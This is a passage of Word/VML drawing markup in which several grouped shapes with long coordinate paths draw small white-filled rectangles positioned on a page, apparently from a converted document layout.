,12036,2425,12040,2425,12044,2425,12048,2425,12052,2425,12057,2425,12061,2425,12066,2425,12071,2425,12075,2425,12080,2425,12085,2425,12090,2425,12095,2425,12101,2425,12106,2425,12112,2425,12117,2425,12123,2425,12128,2425,12134,2425,12140,2425,12146,2425,12152,2425,12159,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2424,12165,2424,12165,2424,12165,2424,12165,2424,12165,2424,12165,2424,12165,2423,12165,2423,12165,2423,12165,2423,12165,2423,12165,2422,12165,2422,12165,2422,12165,2422,12165,2421,12165,2421,12165,2421,12165,2420,12165,2420,12165,2420,12165,2419,12165,2419,12165,2418,12165,2418,12165,2417,12165,2417,12165,2416,12165,2416,12165,2415,12165,2415,12165,2414,12165,2413,12165,2413,12165,2412,12165,2411,12165,2411,12165,2410,12165,2409,12165,2408,12165,2407,12165,2407,12165,2406,12165,2405,12165,2404,12165,2403,12165,2402,12165,2401,12165,2400,12165,2399,12165,2398,12165,2396,12165,2395,12165,2394,12165,2393,12165,2391,12165,2390,12165,2389,12165,2387,12165,2386,12165,2384,12165,2383,12165,2381,12165,2380,12165,2378,12165,2377,12165,2375,12165,2373,12165,2372,12165,2370,12165,2368,12165,2366,12165,2364,12165,2362,12165,2360,12165,2358,12165,2356,12165,2354,12165,2352,12165,2350,12165,2347,12165,2345,12165,2343,12165,2340,12165,2338,12165,2335,12165,2333,12165,2330,12165,2328,12165,2325,12165,2322,12165,2320,12165,2317,12165,2314,12165,2311,12165,2308,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12164,2305,12164,2305,12164,2305,12164,2305,12164,2305,12164,2305,12163,2305,12163,2305,12163,2305,12162,2305,12162,2305,12162,2305,12161,2305,12161,2305,12161,2305,12160,2305,12160,2305,12159,2305,12159,2305,12158,2305,12157,2305,12157,2305,12156,2305,12155,2305,12155,2305,12154,2305,12153,2305,12152,2305,12151,2305,12150,2305,12149,2305,12148,2305,12147,2305,12146,2305,12145,2305,12144,2305,12143,2305,12141,2305,12140,2305,12139,2305,12137,2305,12136,2305,12134,2305,12132,2305,12131,2305,12129,2305,12127,2305,12125,2305,12124,2305,12122,2305,12120,2305,12118,2305,12115,2305,12113,2305,12111,2305,12109,2305,12106,2305,12104,2305,12101,2305,12099,2305,12096,2305,12093,2305,12090,2305,12088,2305,12085,2305,12082,2305,12079,2305,12075,2305,12072,2305,12069,2305,12065,2305,12062,2305,12058,2305,12055,2305,12051,2305,12047,2305,12043,2305,12039,2305,12035,2305,12031,2305,12027,2305,12023,2305,12018,2305,12014,2305,12009,2305,12004,2305,12000,2305,11995,2305,11990,2305,11985,2305,11980,2305,11974,2305,11969,2305,11964,2305,11958,2305,11952,2305,11947,2305,11941,2305,11935,2305,11929,2305,11923,2305,11916,2305,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:120.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2410,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:2410;top:11890;width:130;height:270" coordorigin="2410,11890" coordsize="130,270" path="m2425,11910l2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2426,11910,2426,11910,2426,11910,2426,11910,2426,11910,2426,11910,2426,11910,2426,11910,2426,11910,2426,11910,2426,11910,2427,11910,2427,11910,2427,11910,2427,11910,2427,11910,2428,11910,2428,11910,2428,11910,2428,11910,2429,11910,2429,11910,2429,11910,2429,11910,2430,11910,2430,11910,2430,11910,2431,11910,2431,11910,2432,11910,2432,11910,2433,11910,2433,11910,2434,11910,2434,11910,2435,11910,2435,11910,2436,11910,2436,11910,2437,11910,2438,11910,2438,11910,2439,11910,2440,11910,2441,11910,2441,11910,2442,11910,2443,11910,2444,11910,2445,11910,2446,11910,2447,11910,2448,11910,2449,11910,2450,11910,2451,11910,2452,11910,2453,11910,2454,11910,2455,11910,2456,11910,2458,11910,2459,11910,2460,11910,2462,11910,2463,11910,2465,11910,2466,11910,2467,11910,2469,11910,2471,11910,2472,11910,2474,11910,2475,11910,2477,11910,2479,11910,2481,11910,2483,11910,2484,11910,2486,11910,2488,11910,2490,11910,2492,11910,2494,11910,2496,11910,2499,11910,2501,11910,2503,11910,2505,11910,2508,11910,2510,11910,2512,11910,2515,11910,2517,11910,2520,11910,2523,11910,2525,11910,2528,11910,2531,11910,2534,11910,2536,11910,2539,11910,2542,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11911,2545,11911,2545,11911,2545,11911,2545,11911,2545,11911,2545,11911,2545,11912,2545,11912,2545,11912,2545,11912,2545,11913,2545,11913,2545,11913,2545,11914,2545,11914,2545,11915,2545,11915,2545,11915,2545,11916,2545,11916,2545,11917,2545,11918,2545,11918,2545,11919,2545,11920,2545,11920,2545,11921,2545,11922,2545,11923,2545,11924,2545,11925,2545,11926,2545,11927,2545,11928,2545,11929,2545,11930,2545,11931,2545,11933,2545,11934,2545,11935,2545,11937,2545,11938,2545,11940,2545,11941,2545,11943,2545,11944,2545,11946,2545,11948,2545,11950,2545,11952,2545,11954,2545,11956,2545,11958,2545,11960,2545,11962,2545,11964,2545,11967,2545,11969,2545,11971,2545,11974,2545,11976,2545,11979,2545,11982,2545,11985,2545,11988,2545,11990,2545,11993,2545,11997,2545,12000,2545,12003,2545,12006,2545,12010,2545,12013,2545,12017,2545,12020,2545,12024,2545,12028,2545,12032,2545,12036,2545,12040,2545,12044,2545,12048,2545,12052,2545,12057,2545,12061,2545,12066,2545,12071,2545,12075,2545,12080,2545,12085,2545,12090,2545,12095,2545,12101,2545,12106,2545,12112,2545,12117,2545,12123,2545,12128,2545,12134,2545,12140,2545,12146,2545,12152,2545,12159,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2544,12165,2544,12165,2544,12165,2544,12165,2544,12165,2544,12165,2544,12165,2543,12165,2543,12165,2543,12165,2543,12165,2542,12165,2542,12165,2542,12165,2542,12165,2541,12165,2541,12165,2541,12165,2540,12165,2540,12165,2540,12165,2539,12165,2539,12165,2538,12165,2538,12165,2537,12165,2537,12165,2536,12165,2536,12165,2535,12165,2535,12165,2534,12165,2533,12165,2533,12165,2532,12165,2531,12165,2531,12165,2530,12165,2529,12165,2528,12165,2527,12165,2527,12165,2526,12165,2525,12165,2524,12165,2523,12165,2522,12165,2521,12165,2520,12165,2519,12165,2518,12165,2516,12165,2515,12165,2514,12165,2513,12165,2511,12165,2510,12165,2509,12165,2507,12165,2506,12165,2505,12165,2503,12165,2502,12165,2500,12165,2498,12165,2497,12165,2495,12165,2493,12165,2492,12165,2490,12165,2488,12165,2486,12165,2484,12165,2482,12165,2480,12165,2478,12165,2476,12165,2474,12165,2472,12165,2470,12165,2467,12165,2465,12165,2463,12165,2460,12165,2458,12165,2456,12165,2453,12165,2450,12165,2448,12165,2445,12165,2442,12165,2440,12165,2437,12165,2434,12165,2431,12165,2428,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12165,2425,12164,2425,12164,2425,12164,2425,12164,2425,12164,2425,12164,2425,12163,2425,12163,2425,12163,2425,12162,2425,12162,2425,12162,2425,12161,2425,12161,2425,12161,2425,12160,2425,12160,2425,12159,2425,12159,2425,12158,2425,12157,2425,12157,2425,12156,2425,12155,2425,12155,2425,12154,2425,12153,2425,12152,2425,12151,2425,12150,2425,12149,2425,12148,2425,12147,2425,12146,2425,12145,2425,12144,2425,12143,2425,12141,2425,12140,2425,12139,2425,12137,2425,12136,2425,12134,2425,12132,2425,12131,2425,12129,2425,12127,2425,12125,2425,12124,2425,12122,2425,12120,2425,12118,2425,12115,2425,12113,2425,12111,2425,12109,2425,12106,2425,12104,2425,12101,2425,12099,2425,12096,2425,12093,2425,12090,2425,12088,2425,12085,2425,12082,2425,12079,2425,12075,2425,12072,2425,12069,2425,12065,2425,12062,2425,12058,2425,12055,2425,12051,2425,12047,2425,12043,2425,12039,2425,12035,2425,12031,2425,12027,2425,12023,2425,12018,2425,12014,2425,12009,2425,12004,2425,12000,2425,11995,2425,11990,2425,11985,2425,11980,2425,11974,2425,11969,2425,11964,2425,11958,2425,11952,2425,11947,2425,11941,2425,11935,2425,11929,2425,11923,2425,11916,2425,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:2530;top:11890;width:130;height:270" coordorigin="2530,11890" coordsize="130,270" path="m2545,11910l2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2545,11910,2546,11910,2546,11910,2546,11910,2546,11910,2546,11910,2546,11910,2546,11910,2546,11910,2546,11910,2546,11910,2546,11910,2547,11910,2547,11910,2547,11910,2547,11910,2547,11910,2547,11910,2548,11910,2548,11910,2548,11910,2548,11910,2549,11910,2549,11910,2549,11910,2550,11910,2550,11910,2550,11910,2551,11910,2551,11910,2551,11910,2552,11910,2552,11910,2553,11910,2553,11910,2554,11910,2554,11910,2555,11910,2555,11910,2556,11910,2556,11910,2557,11910,2558,11910,2558,11910,2559,11910,2560,11910,2561,11910,2561,11910,2562,11910,2563,11910,2564,11910,2565,11910,2566,11910,2567,11910,2568,11910,2569,11910,2570,11910,2571,11910,2572,11910,2573,11910,2574,11910,2575,11910,2577,11910,2578,11910,2579,11910,2580,11910,2582,11910,2583,11910,2585,11910,2586,11910,2588,11910,2589,11910,2591,11910,2592,11910,2594,11910,2596,11910,2597,11910,2599,11910,2601,11910,2603,11910,2604,11910,2606,11910,2608,11910,2610,11910,2612,11910,2614,11910,2617,11910,2619,11910,2621,11910,2623,11910,2625,11910,2628,11910,2630,11910,2633,11910,2635,11910,2638,11910,2640,11910,2643,11910,2645,11910,2648,11910,2651,11910,2654,11910,2656,11910,2659,11910,2662,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11911,2665,11911,2665,11911,2665,11911,2665,11911,2665,11911,2665,11911,2665,11912,2665,11912,2665,11912,2665,11912,2665,11913,2665,11913,2665,11913,2665,11914,2665,11914,2665,11915,2665,11915,2665,11915,2665,11916,2665,11916,2665,11917,2665,11918,2665,11918,2665,11919,2665,11920,2665,11920,2665,11921,2665,11922,2665,11923,2665,11924,2665,11925,2665,11926,2665,11927,2665,11928,2665,11929,2665,11930,2665,11931,2665,11933,2665,11934,2665,11935,2665,11937,2665,11938,2665,11940,2665,11941,2665,11943,2665,11944,2665,11946,2665,11948,2665,11950,2665,11952,2665,11954,2665,11956,2665,11958,2665,11960,2665,11962,2665,11964,2665,11967,2665,11969,2665,11971,2665,11974,2665,11976,2665,11979,2665,11982,2665,11985,2665,11988,2665,11990,2665,11993,2665,11997,2665,12000,2665,12003,2665,12006,2665,12010,2665,12013,2665,12017,2665,12020,2665,12024,2665,12028,2665,12032,2665,12036,2665,12040,2665,12044,2665,12048,2665,12052,2665,12057,2665,12061,2665,12066,2665,12071,2665,12075,2665,12080,2665,12085,2665,12090,2665,12095,2665,12101,2665,12106,2665,12112,2665,12117,2665,12123,2665,12128,2665,12134,2665,12140,2665,12146,2665,12152,2665,12159,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2664,12165,2664,12165,2664,12165,2664,12165,2664,12165,2664,12165,2664,12165,2663,12165,2663,12165,2663,12165,2663,12165,2663,12165,2662,12165,2662,12165,2662,12165,2661,12165,2661,12165,2661,12165,2660,12165,2660,12165,2660,12165,2659,12165,2659,12165,2658,12165,2658,12165,2657,12165,2657,12165,2656,12165,2656,12165,2655,12165,2655,12165,2654,12165,2653,12165,2653,12165,2652,12165,2651,12165,2651,12165,2650,12165,2649,12165,2648,12165,2648,12165,2647,12165,2646,12165,2645,12165,2644,12165,2643,12165,2642,12165,2641,12165,2640,12165,2639,12165,2638,12165,2636,12165,2635,12165,2634,12165,2633,12165,2632,12165,2630,12165,2629,12165,2627,12165,2626,12165,2625,12165,2623,12165,2622,12165,2620,12165,2618,12165,2617,12165,2615,12165,2613,12165,2612,12165,2610,12165,2608,12165,2606,12165,2604,12165,2602,12165,2600,12165,2598,12165,2596,12165,2594,12165,2592,12165,2590,12165,2587,12165,2585,12165,2583,12165,2580,12165,2578,12165,2576,12165,2573,12165,2571,12165,2568,12165,2565,12165,2563,12165,2560,12165,2557,12165,2554,12165,2551,12165,2548,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12165,2545,12164,2545,12164,2545,12164,2545,12164,2545,12164,2545,12164,2545,12163,2545,12163,2545,12163,2545,12162,2545,12162,2545,12162,2545,12161,2545,12161,2545,12161,2545,12160,2545,12160,2545,12159,2545,12159,2545,12158,2545,12157,2545,12157,2545,12156,2545,12155,2545,12155,2545,12154,2545,12153,2545,12152,2545,12151,2545,12150,2545,12149,2545,12148,2545,12147,2545,12146,2545,12145,2545,12144,2545,12143,2545,12141,2545,12140,2545,12139,2545,12137,2545,12136,2545,12134,2545,12132,2545,12131,2545,12129,2545,12127,2545,12125,2545,12124,2545,12122,2545,12120,2545,12118,2545,12115,2545,12113,2545,12111,2545,12109,2545,12106,2545,12104,2545,12101,2545,12099,2545,12096,2545,12093,2545,12090,2545,12088,2545,12085,2545,12082,2545,12079,2545,12075,2545,12072,2545,12069,2545,12065,2545,12062,2545,12058,2545,12055,2545,12051,2545,12047,2545,12043,2545,12039,2545,12035,2545,12031,2545,12027,2545,12023,2545,12018,2545,12014,2545,12009,2545,12004,2545,12000,2545,11995,2545,11990,2545,11985,2545,11980,2545,11974,2545,11969,2545,11964,2545,11958,2545,11952,2545,11947,2545,11941,2545,11935,2545,11929,2545,11923,2545,11916,2545,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:11890;width:130;height:270" coordorigin="2650,11890" coordsize="130,270" path="m2665,11910l2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2665,11910,2666,11910,2666,11910,2666,11910,2666,11910,2666,11910,2666,11910,2666,11910,2666,11910,2666,11910,2666,11910,2666,11910,2666,11910,2667,11910,2667,11910,2667,11910,2667,11910,2667,11910,2667,11910,2668,11910,2668,11910,2668,11910,2668,11910,2669,11910,2669,11910,2669,11910,2670,11910,2670,11910,2670,11910,2671,11910,2671,11910,2671,11910,2672,11910,2672,11910,2673,11910,2673,11910,2674,11910,2674,11910,2675,11910,2675,11910,2676,11910,2677,11910,2677,11910,2678,11910,2679,11910,2679,11910,2680,11910,2681,11910,2682,11910,2682,11910,2683,11910,2684,11910,2685,11910,2686,11910,2687,11910,2688,11910,2689,11910,2690,11910,2691,11910,2692,11910,2693,11910,2694,11910,2695,11910,2697,11910,2698,11910,2699,11910,2700,11910,2702,11910,2703,11910,2705,11910,2706,11910,2708,11910,2709,11910,2711,11910,2712,11910,2714,11910,2716,11910,2717,11910,2719,11910,2721,11910,2723,11910,2725,11910,2726,11910,2728,11910,2730,11910,2732,11910,2734,11910,2737,11910,2739,11910,2741,11910,2743,11910,2745,11910,2748,11910,2750,11910,2753,11910,2755,11910,2758,11910,2760,11910,2763,11910,2765,11910,2768,11910,2771,11910,2774,11910,2777,11910,2779,11910,2782,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11911,2785,11911,2785,11911,2785,11911,2785,11911,2785,11911,2785,11911,2785,11912,2785,11912,2785,11912,2785,11912,2785,11913,2785,11913,2785,11913,2785,11914,2785,11914,2785,11915,2785,11915,2785,11915,2785,11916,2785,11916,2785,11917,2785,11918,2785,11918,2785,11919,2785,11920,2785,11920,2785,11921,2785,11922,2785,11923,2785,11924,2785,11925,2785,11926,2785,11927,2785,11928,2785,11929,2785,11930,2785,11931,2785,11933,2785,11934,2785,11935,2785,11937,2785,11938,2785,11940,2785,11941,2785,11943,2785,11944,2785,11946,2785,11948,2785,11950,2785,11952,2785,11954,2785,11956,2785,11958,2785,11960,2785,11962,2785,11964,2785,11967,2785,11969,2785,11971,2785,11974,2785,11976,2785,11979,2785,11982,2785,11985,2785,11988,2785,11990,2785,11993,2785,11997,2785,12000,2785,12003,2785,12006,2785,12010,2785,12013,2785,12017,2785,12020,2785,12024,2785,12028,2785,12032,2785,12036,2785,12040,2785,12044,2785,12048,2785,12052,2785,12057,2785,12061,2785,12066,2785,12071,2785,12075,2785,12080,2785,12085,2785,12090,2785,12095,2785,12101,2785,12106,2785,12112,2785,12117,2785,12123,2785,12128,2785,12134,2785,12140,2785,12146,2785,12152,2785,12159,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2784,12165,2784,12165,2784,12165,2784,12165,2784,12165,2784,12165,2783,12165,2783,12165,2783,12165,2783,12165,2783,12165,2782,12165,2782,12165,2782,12165,2781,12165,2781,12165,2781,12165,2780,12165,2780,12165,2780,12165,2779,12165,2779,12165,2778,12165,2778,12165,2778,12165,2777,12165,2776,12165,2776,12165,2775,12165,2775,12165,2774,12165,2774,12165,2773,12165,2772,12165,2772,12165,2771,12165,2770,12165,2769,12165,2768,12165,2768,12165,2767,12165,2766,12165,2765,12165,2764,12165,2763,12165,2762,12165,2761,12165,2760,12165,2759,12165,2758,12165,2757,12165,2755,12165,2754,12165,2753,12165,2752,12165,2750,12165,2749,12165,2748,12165,2746,12165,2745,12165,2743,12165,2742,12165,2740,12165,2738,12165,2737,12165,2735,12165,2733,12165,2732,12165,2730,12165,2728,12165,2726,12165,2724,12165,2722,12165,2720,12165,2718,12165,2716,12165,2714,12165,2712,12165,2710,12165,2708,12165,2705,12165,2703,12165,2701,12165,2698,12165,2696,12165,2693,12165,2691,12165,2688,12165,2685,12165,2683,12165,2680,12165,2677,12165,2674,12165,2671,12165,2668,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12165,2665,12164,2665,12164,2665,12164,2665,12164,2665,12164,2665,12164,2665,12163,2665,12163,2665,12163,2665,12162,2665,12162,2665,12162,2665,12161,2665,12161,2665,12161,2665,12160,2665,12160,2665,12159,2665,12159,2665,12158,2665,12157,2665,12157,2665,12156,2665,12155,2665,12155,2665,12154,2665,12153,2665,12152,2665,12151,2665,12150,2665,12149,2665,12148,2665,12147,2665,12146,2665,12145,2665,12144,2665,12143,2665,12141,2665,12140,2665,12139,2665,12137,2665,12136,2665,12134,2665,12132,2665,12131,2665,12129,2665,12127,2665,12125,2665,12124,2665,12122,2665,12120,2665,12118,2665,12115,2665,12113,2665,12111,2665,12109,2665,12106,2665,12104,2665,12101,2665,12099,2665,12096,2665,12093,2665,12090,2665,12088,2665,12085,2665,12082,2665,12079,2665,12075,2665,12072,2665,12069,2665,12065,2665,12062,2665,12058,2665,12055,2665,12051,2665,12047,2665,12043,2665,12039,2665,12035,2665,12031,2665,12027,2665,12023,2665,12018,2665,12014,2665,12009,2665,12004,2665,12000,2665,11995,2665,11990,2665,11985,2665,11980,2665,11974,2665,11969,2665,11964,2665,11958,2665,11952,2665,11947,2665,11941,2665,11935,2665,11929,2665,11923,2665,11916,2665,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:11890;width:130;height:270" coordorigin="2770,11890" coordsize="130,270" path="m2785,11910l2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2785,11910,2786,11910,2786,11910,2786,11910,2786,11910,2786,11910,2786,11910,2786,11910,2786,11910,2786,11910,2786,11910,2786,11910,2786,11910,2786,11910,2787,11910,2787,11910,2787,11910,2787,11910,2787,11910,2787,11910,2788,11910,2788,11910,2788,11910,2788,11910,2788,11910,2789,11910,2789,11910,2789,11910,2790,11910,2790,11910,2790,11910,2791,11910,2791,11910,2791,11910,2792,11910,2792,11910,2793,11910,2793,11910,2794,11910,2794,11910,2795,11910,2795,11910,2796,11910,2797,11910,2797,11910,2798,11910,2799,11910,2799,11910,2800,11910,2801,11910,2802,11910,2802,11910,2803,11910,2804,11910,2805,11910,2806,11910,2807,11910,2808,11910,2809,11910,2810,11910,2811,11910,2812,11910,2813,11910,2814,11910,2815,11910,2817,11910,2818,11910,2819,11910,2821,11910,2822,11910,2823,11910,2825,11910,2826,11910,2828,11910,2829,11910,2831,11910,2832,11910,2834,11910,2836,11910,2837,11910,2839,11910,2841,11910,2843,11910,2845,11910,2846,11910,2848,11910,2850,11910,2852,11910,2855,11910,2857,11910,2859,11910,2861,11910,2863,11910,2866,11910,2868,11910,2870,11910,2873,11910,2875,11910,2878,11910,2880,11910,2883,11910,2885,11910,2888,11910,2891,11910,2894,11910,2897,11910,2900,11910,2902,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11911,2905,11911,2905,11911,2905,11911,2905,11911,2905,11911,2905,11911,2905,11912,2905,11912,2905,11912,2905,11912,2905,11913,2905,11913,2905,11913,2905,11914,2905,11914,2905,11915,2905,11915,2905,11915,2905,11916,2905,11916,2905,11917,2905,11918,2905,11918,2905,11919,2905,11920,2905,11920,2905,11921,2905,11922,2905,11923,2905,11924,2905,11925,2905,11926,2905,11927,2905,11928,2905,11929,2905,11930,2905,11931,2905,11933,2905,11934,2905,11935,2905,11937,2905,11938,2905,11940,2905,11941,2905,11943,2905,11944,2905,11946,2905,11948,2905,11950,2905,11952,2905,11954,2905,11956,2905,11958,2905,11960,2905,11962,2905,11964,2905,11967,2905,11969,2905,11971,2905,11974,2905,11976,2905,11979,2905,11982,2905,11985,2905,11988,2905,11990,2905,11993,2905,11997,2905,12000,2905,12003,2905,12006,2905,12010,2905,12013,2905,12017,2905,12020,2905,12024,2905,12028,2905,12032,2905,12036,2905,12040,2905,12044,2905,12048,2905,12052,2905,12057,2905,12061,2905,12066,2905,12071,2905,12075,2905,12080,2905,12085,2905,12090,2905,12095,2905,12101,2905,12106,2905,12112,2905,12117,2905,12123,2905,12128,2905,12134,2905,12140,2905,12146,2905,12152,2905,12159,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2904,12165,2904,12165,2904,12165,2904,12165,2904,12165,2904,12165,2904,12165,2903,12165,2903,12165,2903,12165,2903,12165,2902,12165,2902,12165,2902,12165,2902,12165,2901,12165,2901,12165,2901,12165,2900,12165,2900,12165,2899,12165,2899,12165,2899,12165,2898,12165,2898,12165,2897,12165,2897,12165,2896,12165,2895,12165,2895,12165,2894,12165,2894,12165,2893,12165,2892,12165,2892,12165,2891,12165,2890,12165,2889,12165,2888,12165,2888,12165,2887,12165,2886,12165,2885,12165,2884,12165,2883,12165,2882,12165,2881,12165,2880,12165,2879,12165,2878,12165,2877,12165,2875,12165,2874,12165,2873,12165,2872,12165,2870,12165,2869,12165,2868,12165,2866,12165,2865,12165,2863,12165,2862,12165,2860,12165,2859,12165,2857,12165,2855,12165,2854,12165,2852,12165,2850,12165,2848,12165,2846,12165,2844,12165,2842,12165,2840,12165,2838,12165,2836,12165,2834,12165,2832,12165,2830,12165,2828,12165,2825,12165,2823,12165,2821,12165,2818,12165,2816,12165,2813,12165,2811,12165,2808,12165,2805,12165,2803,12165,2800,12165,2797,12165,2794,12165,2791,12165,2788,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12165,2785,12164,2785,12164,2785,12164,2785,12164,2785,12164,2785,12164,2785,12163,2785,12163,2785,12163,2785,12162,2785,12162,2785,12162,2785,12161,2785,12161,2785,12161,2785,12160,2785,12160,2785,12159,2785,12159,2785,12158,2785,12157,2785,12157,2785,12156,2785,12155,2785,12155,2785,12154,2785,12153,2785,12152,2785,12151,2785,12150,2785,12149,2785,12148,2785,12147,2785,12146,2785,12145,2785,12144,2785,12143,2785,12141,2785,12140,2785,12139,2785,12137,2785,12136,2785,12134,2785,12132,2785,12131,2785,12129,2785,12127,2785,12125,2785,12124,2785,12122,2785,12120,2785,12118,2785,12115,2785,12113,2785,12111,2785,12109,2785,12106,2785,12104,2785,12101,2785,12099,2785,12096,2785,12093,2785,12090,2785,12088,2785,12085,2785,12082,2785,12079,2785,12075,2785,12072,2785,12069,2785,12065,2785,12062,2785,12058,2785,12055,2785,12051,2785,12047,2785,12043,2785,12039,2785,12035,2785,12031,2785,12027,2785,12023,2785,12018,2785,12014,2785,12009,2785,12004,2785,12000,2785,11995,2785,11990,2785,11985,2785,11980,2785,11974,2785,11969,2785,11964,2785,11958,2785,11952,2785,11947,2785,11941,2785,11935,2785,11929,2785,11923,2785,11916,2785,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:144.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2890,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:2890;top:11890;width:130;height:270" coordorigin="2890,11890" coordsize="130,270" path="m2905,11910l2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2905,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2906,11910,2907,11910,2907,11910,2907,11910,2907,11910,2907,11910,2907,11910,2908,11910,2908,11910,2908,11910,2908,11910,2909,11910,2909,11910,2909,11910,2909,11910,2910,11910,2910,11910,2910,11910,2911,11910,2911,11910,2912,11910,2912,11910,2912,11910,2913,11910,2913,11910,2914,11910,2914,11910,2915,11910,2915,11910,2916,11910,2917,11910,2917,11910,2918,11910,2919,11910,2919,11910,2920,11910,2921,11910,2922,11910,2922,11910,2923,11910,2924,11910,2925,11910,2926,11910,2927,11910,2928,11910,2929,11910,2930,11910,2931,11910,2932,11910,2933,11910,2934,11910,2936,11910,2937,11910,2938,11910,2939,11910,2941,11910,2942,11910,2943,11910,2945,11910,2946,11910,2948,11910,2949,11910,2951,11910,2952,11910,2954,11910,2956,11910,2957,11910,2959,11910,2961,11910,2963,11910,2965,11910,2967,11910,2968,11910,2970,11910,2973,11910,2975,11910,2977,11910,2979,11910,2981,11910,2983,11910,2986,11910,2988,11910,2990,11910,2993,11910,2995,11910,2998,11910,3000,11910,3003,11910,3006,11910,3008,11910,3011,11910,3014,11910,